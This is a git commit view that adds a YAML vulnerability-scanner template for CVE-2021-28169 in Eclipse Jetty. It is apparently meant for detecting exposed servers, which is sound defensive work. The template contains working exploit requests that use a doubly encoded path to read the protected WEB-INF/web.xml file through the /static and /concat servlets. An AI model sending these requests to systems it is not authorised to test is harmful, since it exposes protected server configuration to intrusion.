Merge pull request #1776 from pikpikcu/patch-187

Create CVE-2021-28169.yaml
patch-1
Sandeep Singh 2021-06-25 00:02:51 +05:30 committed by GitHub
commit e4e8e6e148
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: CVE-2021-28169
info:
name: Jetty Utility Servlets Information Disclosure
author: pikpikcu
severity: info
reference: |
- https://twitter.com/sec715/status/1406787963569065988
- https://nvd.nist.gov/vuln/detail/CVE-2021-28169
description: |
For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory.
tags: cve,cve2021,jetty
requests:
- method: GET
path:
- "{{BaseURL}}/static?/%2557EB-INF/web.xml"
- "{{BaseURL}}/concat?/%2557EB-INF/web.xml"
matchers-condition: and
matchers:
- type: word
words:
- "application/xml"
part: header
- type: word
words:
- "<web-app>"
- "java.sun.com"
part: body
condition: and
- type: status
status:
- 200